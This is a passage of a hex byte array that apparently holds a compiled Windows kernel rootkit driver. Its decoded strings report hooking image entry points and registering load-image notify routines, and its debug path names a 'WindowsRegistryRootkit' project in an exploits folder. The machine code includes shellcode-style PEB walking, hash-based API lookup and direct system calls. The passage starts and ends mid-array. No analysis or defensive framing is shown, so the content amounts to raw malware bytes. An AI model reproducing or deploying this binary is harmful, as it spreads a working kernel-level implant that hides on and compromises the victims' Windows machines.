0x65,0x73,0x73,0x3a,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00, 0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68, 0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a,0x20,0x30,0x78, 0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x48,0x6f,0x6f,0x6b,0x49,0x6d,0x61,0x67, 0x65,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x49,0x6d,0x61,0x67,0x65,0x20, 0x65,0x6e,0x74,0x72,0x79,0x20,0x70,0x6f,0x69,0x6e,0x74,0x20,0x68,0x6f,0x6f,0x6b, 0x65,0x64,0x20,0x28,0x30,0x78,0x25,0x2e,0x38,0x78,0x20,0x2d,0x3e,0x20,0x30,0x78, 0x25,0x2e,0x38,0x78,0x29,0x0a,0x00,0x00,0x49,0x4e,0x49,0x54,0x00,0x00,0x00,0x00, 0x25,0x64,0x20,0x66,0x72,0x65,0x65,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x5c,0x00,0x48,0x00, 0x54,0x00,0x54,0x00,0x50,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00, 0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00,0x62,0x00,0x2e,0x00, 0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00, 0x73,0x00,0x6d,0x00,0x62,0x00,0x31,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00, 0x73,0x00,0x00,0x00,0x5c,0x00,0x6d,0x00,0x72,0x00,0x78,0x00,0x73,0x00,0x6d,0x00, 0x62,0x00,0x32,0x00,0x30,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00, 0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00, 0x00,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x32,0x00,0x2e,0x00, 0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00,0x5c,0x00,0x73,0x00,0x65,0x00,0x63,0x00, 0x64,0x00,0x72,0x00,0x76,0x00,0x2e,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x00,0x00, 0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x28, 0x29,0x3a,0x20,0x27,0x25,0x77,0x5a,0x27,0x20,0x69,0x73,0x20,0x61,0x74,0x20,0x30, 0x78,0x25,0x2e,0x38,0x78,0x2c,0x20,0x73,0x69,0x7a,0x65,0x3d,0x25,0x64,0x0a,0x00, 0x44,0x72,0x69,0x76,0x65,0x72,0x45,0x6e,0x74,0x72,0x79,0x28,0x29,0x3a,0x20,0x4c, 0x6f,0x61,0x64,0x65,0x64,0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a, 0x00,0x00,0x00,0x00,0x52,0x6f,0x6f,0x74,0x6b,0x69,0x74,0x20,0x63,0x6f,0x64,0x65, 0x3a,0x20,0x30,0x78,0x25,0x78,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x66,0x72,0x6f, 0x6d,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x50,0x73,0x53,0x65, 0x74,0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79, 0x52,0x6f,0x75,0x74,0x69,0x6e,0x65,0x28,0x29,0x20,0x66,0x61,0x69,0x6c,0x73,0x3a, 0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x00,0x45,0x78,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x50,0x6f,0x6f,0x6c,0x28,0x29,0x20,0x66,0x61,0x69, 0x6c,0x73,0x0a,0x00,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53,0x79,0x73,0x74,0x65, 0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x28,0x29,0x20,0x66, 0x61,0x69,0x6c,0x73,0x3b,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3a,0x20,0x30,0x78, 0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00, 0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00, 0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00, 0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00, 0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x61,0x00,0x63,0x00,0x70,0x00, 0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00, 0x6c,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x63,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00, 0x6c,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x73,0x00, 0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00, 0x6c,0x00,0x61,0x00,0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00, 0x6c,0x00,0x6c,0x00,0x00,0x00,0x00,0x00,0x68,0x00,0x61,0x00,0x6c,0x00,0x6d,0x00, 0x61,0x00,0x63,0x00,0x70,0x00,0x69,0x00,0x2e,0x00,0x64,0x00,0x6c,0x00,0x6c,0x00, 0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6f,0x00,0x73,0x00,0x6b,0x00,0x72,0x00, 0x6e,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00, 0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x70,0x00,0x61,0x00, 0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00, 0x6b,0x00,0x72,0x00,0x6e,0x00,0x6c,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00, 0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6e,0x00,0x74,0x00,0x6b,0x00,0x72,0x00, 0x70,0x00,0x61,0x00,0x6d,0x00,0x70,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00, 0x00,0x00,0x00,0x00,0x6e,0x74,0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65, 0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69, 0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a,0x20,0x4b,0x65,0x72,0x6e,0x65,0x6c,0x20, 0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78,0x25,0x2e,0x38,0x78,0x0a,0x00, 0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73,0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74, 0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x3a, 0x20,0x4e,0x44,0x49,0x53,0x20,0x62,0x61,0x73,0x65,0x20,0x69,0x73,0x20,0x30,0x78, 0x25,0x2e,0x38,0x78,0x0a,0x00,0x00,0x00,0x6e,0x64,0x69,0x73,0x2e,0x73,0x79,0x73, 0x00,0x00,0x00,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x49,0x6e,0x69,0x74,0x69, 0x61,0x6c,0x69,0x7a,0x65,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x3a,0x20,0x55, 0x6e,0x61,0x62,0x6c,0x65,0x20,0x74,0x6f,0x20,0x6c,0x6f,0x63,0x61,0x74,0x65,0x20, 0x4e,0x44,0x49,0x53,0x0a,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xc0,0x2d,0x00,0x10,0x20,0x0f,0x00,0x10,0x01,0x00,0x00,0x00, 0x52,0x53,0x44,0x53,0x30,0xf9,0x23,0x4b,0x06,0x74,0x2c,0x46,0x98,0xa0,0x13,0x7b, 0x60,0xd0,0x84,0xd2,0x03,0x00,0x00,0x00,0x78,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f, 0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c, 0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52, 0x6f,0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x72,0x6f,0x6f,0x74,0x6b, 0x69,0x74,0x5f,0x64,0x72,0x69,0x76,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e, 0x70,0x64,0x62,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x2a,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x55,0x8b,0xec,0x5d,0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x7c,0x83,0x3d,0xc8,0x2d,0x00,0x10,0x00,0x74,0x0a,0xa1, 0xc8,0x2d,0x00,0x10,0xe9,0xd8,0x00,0x00,0x00,0xc7,0x45,0x84,0x00,0x00,0x00,0x00, 0x6a,0x6c,0x6a,0x00,0x8d,0x45,0x90,0x50,0xe8,0x81,0x1b,0x00,0x00,0x83,0xc4,0x0c, 0xc6,0x45,0x90,0x05,0xc6,0x45,0x91,0x00,0xc7,0x45,0x98,0x40,0x0f,0x00,0x10,0xc7, 0x45,0x9c,0x70,0x0f,0x00,0x10,0xc7,0x45,0xa0,0xc0,0x0f,0x00,0x10,0xc7,0x45,0xa4, 0xd0,0x0f,0x00,0x10,0xc7,0x45,0xa8,0x80,0x0f,0x00,0x10,0xc7,0x45,0xac,0x90,0x0f, 0x00,0x10,0xc7,0x45,0xb0,0xe0,0x0f,0x00,0x10,0xc7,0x45,0xb4,0xf0,0x0f,0x00,0x10, 0xc7,0x45,0xb8,0xa0,0x0f,0x00,0x10,0xc7,0x45,0xbc,0xb0,0x0f,0x00,0x10,0xc7,0x45, 0xcc,0x30,0x0f,0x00,0x10,0xc7,0x45,0xd0,0x50,0x0f,0x00,0x10,0xc7,0x45,0xd8,0x60, 0x0f,0x00,0x10,0xc7,0x45,0xc8,0x00,0x10,0x00,0x10,0xc7,0x45,0xd4,0x10,0x10,0x00, 0x10,0x68,0x9c,0x03,0x00,0x10,0x8d,0x4d,0x88,0x51,0xff,0x15,0x20,0x03,0x00,0x10, 0x8b,0x55,0x88,0x89,0x55,0xc0,0x8b,0x45,0x8c,0x89,0x45,0xc4,0x6a,0x6c,0x8d,0x4d, 0x90,0x51,0x68,0xc8,0x2d,0x00,0x10,0x8d,0x55,0x84,0x52,0xff,0x15,0x84,0x02,0x00, 0x10,0x83,0x7d,0x84,0x00,0x74,0x15,0x8b,0x45,0x84,0x50,0x68,0xb4,0x03,0x00,0x10, 0xe8,0xbd,0x1a,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0xeb,0x05,0xa1,0xc8,0x2d,0x00, 0x10,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x83,0x3d,0xc8,0x2d,0x00,0x10,0x00,0x74,0x21,0xc7,0x45,0xfc, 0x00,0x00,0x00,0x00,0xa1,0xc8,0x2d,0x00,0x10,0x50,0x8d,0x4d,0xfc,0x51,0xff,0x15, 0x80,0x02,0x00,0x10,0xc7,0x05,0xc8,0x2d,0x00,0x10,0x00,0x00,0x00,0x00,0x8b,0xe5, 0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0x60,0xe8,0x00,0x00,0x00,0x00,0x5b,0x81,0xeb,0x8c, 0x11,0x00,0x10,0xe8,0x6f,0x00,0x00,0x00,0x8b,0xf0,0x68,0xe8,0x60,0xbf,0x04,0x56, 0xe8,0x84,0x00,0x00,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8b,0x3e,0x13,0x00,0x10,0x51, 0xff,0xd0,0x8b,0xf0,0x68,0x89,0xfd,0x12,0xa4,0x56,0xe8,0x6a,0x00,0x00,0x00,0x89, 0x45,0xfc,0x68,0x84,0x9b,0x50,0xf2,0x56,0xe8,0x5c,0x00,0x00,0x00,0x89,0x45,0xf4, 0xff,0x75,0xf4,0xff,0x75,0xfc,0x8b,0x45,0x08,0x50,0xe8,0xa3,0x00,0x00,0x00,0x89, 0x45,0xf8,0x61,0x8b,0x45,0xf8,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0x55,0x8b,0xec,0x8b, 0x45,0x08,0x52,0x33,0xd2,0xc1,0xc2,0x03,0x32,0x10,0x40,0x80,0x38,0x00,0x75,0xf5, 0x8b,0xc2,0x5a,0x5d,0xc2,0x04,0x00,0x56,0x33,0xc0,0x64,0xa1,0x30,0x00,0x00,0x00, 0x78,0x0c,0x8b,0x40,0x0c,0x8b,0x70,0x1c,0xad,0x8b,0x40,0x08,0xeb,0x09,0x8b,0x40, 0x34,0x8d,0x40,0x7c,0x8b,0x40,0x3c,0x5e,0xc3,0x55,0x8b,0xec,0x53,0x56,0x57,0x33, 0xc0,0x8b,0x5d,0x0c,0x8b,0x75,0x08,0x8b,0xfe,0x03,0x76,0x3c,0x8b,0x4e,0x78,0x03, 0xcf,0x8b,0x51,0x1c,0x52,0x8b,0x51,0x24,0x52,0x8b,0x71,0x20,0x03,0xf7,0x99,0x4a, 0xad,0x42,0x03,0x45,0x08,0x50,0xe8,0x91,0xff,0xff,0xff,0x3b,0xc3,0x75,0xf1,0x8b, 0x45,0x08,0x92,0x5e,0x03,0xf2,0xd1,0xe0,0x03,0xc6,0x33,0xc9,0x0f,0xb7,0x08,0x5f, 0xc1,0xe1,0x02,0x03,0xca,0x03,0xcf,0x8b,0x01,0x03,0xc2,0x5f,0x5e,0x5b,0x5d,0xc2, 0x08,0x00,0x55,0x8b,0xec,0x83,0xec,0x10,0x53,0x8b,0x5d,0x08,0x85,0xdb,0x56,0x57, 0x0f,0x84,0xa4,0x00,0x00,0x00,0x8b,0x43,0x3c,0x8b,0xbc,0x18,0x80,0x00,0x00,0x00, 0x03,0xfb,0xe9,0x80,0x00,0x00,0x00,0x8b,0x47,0x0c,0x03,0xc3,0x89,0x45,0xfc,0xff, 0x75,0xfc,0xff,0x55,0x0c,0x89,0x45,0x08,0x83,0x7d,0x08,0x00,0x74,0x7c,0x83,0x7f, 0x04,0xff,0x75,0x04,0x8b,0x07,0xeb,0x03,0x8b,0x47,0x10,0x89,0x45,0xfc,0x8d,0x34, 0x18,0xeb,0x4c,0x8b,0x06,0xa9,0x00,0x00,0x00,0xf0,0x74,0x19,0x25,0xff,0xff,0x00, 0x00,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff,0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf4, 0x8b,0x45,0xf4,0xeb,0x16,0x8d,0x44,0x18,0x02,0x89,0x45,0xf8,0xff,0x75,0xf8,0xff, 0x75,0x08,0xff,0x55,0x10,0x89,0x45,0xf0,0x8b,0x45,0xf0,0x85,0xc0,0x89,0x06,0x74, 0x29,0x8b,0x47,0x10,0x2b,0x45,0xfc,0x8b,0x0e,0x89,0x0c,0x30,0x83,0xc6,0x04,0x83, 0x3e,0x00,0x75,0xaf,0x83,0xc7,0x14,0x83,0x3f,0x00,0x0f,0x85,0x77,0xff,0xff,0xff, 0x33,0xc0,0x40,0x5f,0x5e,0x5b,0xc9,0xc2,0x0c,0x00,0x33,0xc0,0xeb,0xf5,0x6b,0x65, 0x72,0x6e,0x65,0x6c,0x33,0x32,0x00,0x7e,0x45,0x4e,0x44,0xcc,0xcc,0xcc,0xcc,0xcc, 0x83,0x3d,0xdc,0x2d,0x00,0x10,0x00,0x74,0x0e,0xa1,0xdc,0x2d,0x00,0x10,0x8d,0x54, 0x24,0x04,0xcd,0x2e,0xc2,0x14,0x00,0xb8,0x01,0x00,0x00,0x00,0xc2,0x14,0x00,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08, 0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x81,0x39,0x7e,0x45,0x4e,0x44,0x74,0x14,0x8b,0x55, 0xfc,0x83,0xc2,0x01,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x83,0xc0,0x01,0x89,0x45,0xf8, 0xeb,0xe1,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x68,0xe4,0x03,0x00,0x10,0xe8,0x25,0x18,0x00,0x00,0x83,0xc4,0x04, 0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00,0x10,0xff,0x15,0xd4,0x02,0x00,0x10,0x5d, 0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x18,0xc6,0x45,0xf7,0x00,0x83,0x7d,0x08,0x00,0x74,0x0e, 0x8b,0x45,0x08,0x50,0x8d,0x4d,0xf8,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0x8b,0x55, 0x10,0xc7,0x02,0x00,0x00,0x00,0x00,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00, 0x6a,0x05,0xe8,0xe9,0x16,0x00,0x00,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x0f,0x84, 0x4d,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x89,0x4d,0xec,0x83,0x7d,0xec,0x00,0x0f,0x84, 0x31,0x01,0x00,0x00,0x8b,0x55,0xec,0x83,0x7a,0x3c,0x00,0x0f,0x84,0x0a,0x01,0x00, 0x00,0x8b,0x45,0xec,0x83,0x78,0x04,0x00,0x0f,0x86,0xfd,0x00,0x00,0x00,0x83,0x7d, 0x08,0x00,0x74,0x1a,0x6a,0x01,0x8d,0x4d,0xf8,0x51,0x8b,0x55,0xec,0x83,0xc2,0x38, 0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,0x75,0x19,0x83,0x7d, 0x0c,0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x44,0x3b,0x55, 0x0c,0x0f,0x85,0xc4,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x44,0x51,0x8b,0x55, 0xec,0x83,0xc2,0x38,0x52,0x68,0x00,0x04,0x00,0x10,0xe8,0x43,0x17,0x00,0x00,0x83, 0xc4,0x0c,0x8b,0x45,0x10,0x50,0x8b,0x4d,0xec,0x8b,0x91,0xdc,0x00,0x00,0x00,0x52, 0xff,0x15,0x9c,0x02,0x00,0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x8b, 0x45,0xe8,0x50,0x68,0x28,0x04,0x00,0x10,0xe8,0x15,0x17,0x00,0x00,0x83,0xc4,0x08, 0x8b,0x4d,0x14,0x51,0x8b,0x55,0xec,0x8b,0x42,0x44,0x50,0xff,0x15,0x98,0x02,0x00, 0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x8b,0x4d,0xe8,0x51,0x68,0x5c, 0x04,0x00,0x10,0xe8,0xea,0x16,0x00,0x00,0x83,0xc4,0x08,0x8b,0x55,0x10,0x83,0x3a, 0x00,0x74,0x10,0x8b,0x45,0x14,0x83,0x38,0x00,0x74,0x08,0xc6,0x45,0xf7,0x01,0xeb, 0x54,0xeb,0x38,0x8b,0x4d,0x10,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x10,0x8b,0x0a, 0xff,0x15,0x94,0x02,0x00,0x10,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b, 0x4d,0x14,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x14,0x8b,0x0a,0xff,0x15,0x94,0x02, 0x00,0x10,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0xec,0x83,0x39, 0x00,0x75,0x02,0xeb,0x10,0x8b,0x55,0xec,0x8b,0x45,0xec,0x03,0x02,0x89,0x45,0xec, 0xe9,0xc5,0xfe,0xff,0xff,0x6a,0x00,0x8b,0x4d,0xf0,0x51,0xff,0x15,0x90,0x02,0x00, 0x10,0x8a,0x45,0xf7,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0xff,0x68,0xe0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64, 0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xc4,0xd8, 0x53,0x56,0x57,0x89,0x65,0xe8,0x8b,0x45,0x0c,0x8b,0x4d,0x0c,0x03,0x48,0x3c,0x89, 0x4d,0xe0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0x8b,0x55,0xe0,0x8b,0x42,0x50,0x89, 0x45,0xdc,0x6a,0x40,0x68,0x00,0x30,0x00,0x00,0x8d,0x4d,0xdc,0x51,0x6a,0x00,0x8d, 0x55,0xd8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xe4, 0x83,0x7d,0xe4,0x00,0x0f,0x8c,0x26,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x51,0x68,0x90, 0x04,0x00,0x10,0xe8,0xea,0x15,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0x00,0x00, 0x00,0x00,0x8b,0x55,0xdc,0x52,0x6a,0x00,0x8b,0x45,0xd8,0x50,0xe8,0xdd,0x15,0x00, 0x00,0x83,0xc4,0x0c,0x8b,0x4d,0xe0,0x8b,0x51,0x54,0x52,0x8b,0x45,0x0c,0x50,0x8b, 0x4d,0xd8,0x51,0xe8,0xf6,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0xe0,0x0f,0xb7, 0x42,0x14,0x8b,0x4d,0xe0,0x8d,0x54,0x01,0x18,0x89,0x55,0xd4,0xc7,0x45,0xd0,0x00, 0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xc0,0x01,0x89,0x45,0xd0,0x8b,0x4d, 0xe0,0x0f,0xb7,0x51,0x06,0x39,0x55,0xd0,0x73,0x4d,0x8b,0x45,0xd4,0x8b,0x4d,0xd4, 0x8b,0x50,0x10,0x3b,0x51,0x08,0x73,0x0b,0x8b,0x45,0xd4,0x8b,0x48,0x10,0x89,0x4d, 0xcc,0xeb,0x09,0x8b,0x55,0xd4,0x8b,0x42,0x08,0x89,0x45,0xcc,0x8b,0x4d,0xcc,0x51, 0x8b,0x55,0xd4,0x8b,0x45,0x0c,0x03,0x42,0x14,0x50,0x8b,0x4d,0xd4,0x8b,0x55,0xd8, 0x03,0x51,0x0c,0x52,0xe8,0x85,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xd4,0x83, 0xc0,0x28,0x89,0x45,0xd4,0xeb,0x9e,0x8b,0x4d,0xd8,0x51,0x8b,0x55,0xd8,0x52,0xe8, 0x6c,0x12,0x00,0x00,0x0f,0xb6,0xc0,0x85,0xc0,0x74,0x18,0x8b,0x4d,0x14,0x8b,0x55, 0xd8,0x89,0x11,0xc6,0x45,0xcb,0x01,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x8a,0x45, 0xcb,0xeb,0x50,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00, 0x00,0xc3,0x8b,0x65,0xe8,0x68,0xcc,0x04,0x00,0x10,0xe8,0xf3,0x14,0x00,0x00,0x83, 0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00, 0x8d,0x45,0xd8,0x50,0x8b,0x4d,0x08,0x51,0xff,0x15,0xa4,0x02,0x00,0x10,0xeb,0x11, 0x8b,0x55,0xe4,0x52,0x68,0xec,0x04,0x00,0x10,0xe8,0xc4,0x14,0x00,0x00,0x83,0xc4, 0x08,0x32,0xc0,0x8b,0x4d,0xf0,0x64,0x89,0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b, 0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0xff,0x68,0xf0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64, 0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x81,0xc4,0x60, 0xff,0xff,0xff,0x53,0x56,0x57,0x89,0x65,0xe8,0xc6,0x45,0xdf,0x00,0xc7,0x45,0xe0, 0x00,0x00,0x00,0x00,0x8d,0x45,0xe0,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x6a,0x00, 0x68,0x00,0x02,0x00,0x00,0x8b,0x4d,0x08,0x51,0xff,0x15,0x24,0x03,0x00,0x10,0x89, 